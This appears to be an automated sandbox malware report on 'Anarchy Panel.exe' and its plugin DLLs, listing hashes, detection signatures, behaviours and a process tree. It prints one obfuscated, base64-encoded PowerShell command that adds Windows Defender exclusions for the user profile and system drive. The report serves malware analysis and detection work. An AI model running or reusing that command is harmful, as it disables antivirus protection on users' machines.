Overview
overview
10Static
static
10Anarchy Panel.exe
windows7-x64
10Anarchy Panel.exe
windows10-2004-x64
10Plugins/0g...oG.dll
windows7-x64
1Plugins/0g...oG.dll
windows10-2004-x64
1Plugins/59...uJ.dll
windows7-x64
1Plugins/59...uJ.dll
windows10-2004-x64
1Plugins/Cj...qM.dll
windows7-x64
1Plugins/Cj...qM.dll
windows10-2004-x64
1Plugins/EV...LC.dll
windows7-x64
1Plugins/EV...LC.dll
windows10-2004-x64
1Plugins/FBSyChwp.dll
windows7-x64
1Plugins/FBSyChwp.dll
windows10-2004-x64
1Plugins/G3...uZ.dll
windows7-x64
1Plugins/G3...uZ.dll
windows10-2004-x64
1Plugins/KNTmoSnG.dll
windows7-x64
1Plugins/KNTmoSnG.dll
windows10-2004-x64
1Plugins/PK...TS.dll
windows7-x64
1Plugins/PK...TS.dll
windows10-2004-x64
1Plugins/Rs...xj.dll
windows7-x64
1Plugins/Rs...xj.dll
windows10-2004-x64
1Plugins/Wk...pi.dll
windows7-x64
1Plugins/Wk...pi.dll
windows10-2004-x64
1Plugins/eM...s4.dll
windows7-x64
1Plugins/eM...s4.dll
windows10-2004-x64
1Plugins/fzAgyDYa.dll
windows7-x64
1Plugins/fzAgyDYa.dll
windows10-2004-x64
1Plugins/mGWHaG2Jn.dll
windows7-x64
1Plugins/mGWHaG2Jn.dll
windows10-2004-x64
1Plugins/mM...GA.dll
windows7-x64
1Plugins/mM...GA.dll
windows10-2004-x64
1Plugins/oYsKwDG.dll
windows7-x64
1Plugins/oYsKwDG.dll
windows10-2004-x64
1Analysis
-
max time kernel
146s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
25-07-2024 14:08
Behavioral task
behavioral1
Sample
Anarchy Panel.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Anarchy Panel.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
Plugins/0guo3zbo66fqoG.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
Plugins/0guo3zbo66fqoG.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
Plugins/59Zp7paEHDF7luJ.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
Plugins/59Zp7paEHDF7luJ.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
Plugins/CjETR6GpGXqM.dll
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
Plugins/CjETR6GpGXqM.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
Plugins/EVa7gBMKoaHmLC.dll
Resource
win7-20240705-en
Behavioral task
behavioral10
Sample
Plugins/EVa7gBMKoaHmLC.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
Plugins/FBSyChwp.dll
Resource
win7-20240704-en
Behavioral task
behavioral12
Sample
Plugins/FBSyChwp.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral13
Sample
Plugins/G3nl0mDcABnDuZ.dll
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
Plugins/G3nl0mDcABnDuZ.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
Plugins/KNTmoSnG.dll
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
Plugins/KNTmoSnG.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
Plugins/PK0TcnqTGFagQTS.dll
Resource
win7-20240705-en
Behavioral task
behavioral18
Sample
Plugins/PK0TcnqTGFagQTS.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
Plugins/RssCnLKcGRxj.dll
Resource
win7-20240704-en
Behavioral task
behavioral20
Sample
Plugins/RssCnLKcGRxj.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
Plugins/WkUP83aP9CABpi.dll
Resource
win7-20240708-en
Behavioral task
behavioral22
Sample
Plugins/WkUP83aP9CABpi.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral23
Sample
Plugins/eMTYbTz0gueNs4.dll
Resource
win7-20240704-en
Behavioral task
behavioral24
Sample
Plugins/eMTYbTz0gueNs4.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
Plugins/fzAgyDYa.dll
Resource
win7-20240704-en
Behavioral task
behavioral26
Sample
Plugins/fzAgyDYa.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral27
Sample
Plugins/mGWHaG2Jn.dll
Resource
win7-20240705-en
Behavioral task
behavioral28
Sample
Plugins/mGWHaG2Jn.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral29
Sample
Plugins/mML6WKMqdxjDGA.dll
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
Plugins/mML6WKMqdxjDGA.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral31
Sample
Plugins/oYsKwDG.dll
Resource
win7-20240708-en
Behavioral task
behavioral32
Sample
Plugins/oYsKwDG.dll
Resource
win10v2004-20240709-en
General
-
Target
Anarchy Panel.exe
-
Size
60.8MB
-
MD5
c0eb5b0616dad08c48a21f840bf9e2bc
-
SHA1
f41c0747386053e1eb32d710d360a08c35de10c2
-
SHA256
d13fc809b467a28598451093bff3f9649a96082e041e775f174c55d5eadd7cc5
-
SHA512
bfdf7ed57ab450f19748b207ab542136a9c836c4ad174fbf507df3aae7a69acb710a0d66a85d5ec6a6c6b23363fd6ef559a0096d12fbfa322cb4970f4db572b4
-
SSDEEP
1572864:nWEhJfOrr878YLP5X3xCZubIX6+3gl7Mqui:xJfE+rP5HS2h9o
Malware Config
Signatures
-
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/3608-36-0x0000000000810000-0x0000000003EAE000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation Anarchy Panel.exe -
Executes dropped EXE 2 IoCs
pid Process 1388 windowssdk.exe 3608 AnarchyBuilder.exe -
Loads dropped DLL 1 IoCs
pid Process 3608 AnarchyBuilder.exe -
resource yara_rule behavioral2/files/0x0002000000022ab9-6.dat upx behavioral2/memory/1388-8-0x00007FF646880000-0x00007FF647007000-memory.dmp upx behavioral2/memory/1388-69-0x00007FF646880000-0x00007FF647007000-memory.dmp upx behavioral2/memory/1388-75-0x00007FF646880000-0x00007FF647007000-memory.dmp upx -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\windowssdk.exe Anarchy Panel.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Anarchy Panel.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 968 powershell.exe 968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 968 powershell.exe Token: SeDebugPrivilege 3608 AnarchyBuilder.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2000 wrote to memory of 968 2000 Anarchy Panel.exe 86 PID 2000 wrote to memory of 968 2000 Anarchy Panel.exe 86 PID 2000 wrote to memory of 968 2000 Anarchy Panel.exe 86 PID 2000 wrote to memory of 1388 2000 Anarchy Panel.exe 88 PID 2000 wrote to memory of 1388 2000 Anarchy Panel.exe 88 PID 2000 wrote to memory of 3608 2000 Anarchy Panel.exe 89 PID 2000 wrote to memory of 3608 2000 Anarchy Panel.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbgB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAagByACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
C:\Windows\windowssdk.exe"C:\Windows\windowssdk.exe"2⤵
- Executes dropped EXE
PID:1388
-
-
C:\Users\Admin\AppData\Local\Temp\AnarchyBuilder.exe"C:\Users\Admin\AppData\Local\Temp\AnarchyBuilder.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3608
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD556a504a34d2cfbfc7eaa2b68e34af8ad
SHA1426b48b0f3b691e3bb29f465aed9b936f29fc8cc
SHA2569309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961
SHA512170c3645083d869e2368ee16325d7edaeba2d8f1d3d4a6a1054cfdd8616e03073772eeae30c8f79a93173825f83891e7b0e4fd89ef416808359f715a641747d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6.2MB
MD5e58b6dba9e96f3f015010a7796676153
SHA1bae94a6035fe295f803c12b7dbc85cac2bf120a0
SHA2569e8a91ecf50a0e4d9cda2f80380345d8edba197551a2bc5c797cb43007fd8181
SHA5121b357abde0a7fa9dca1e4cb1d15f250800bedf80faa25b8b211f51527484af392ae9d6b47fa6c512eea42124f523654ba92ac6e40aa15fc71d5c98cbfbbdbe59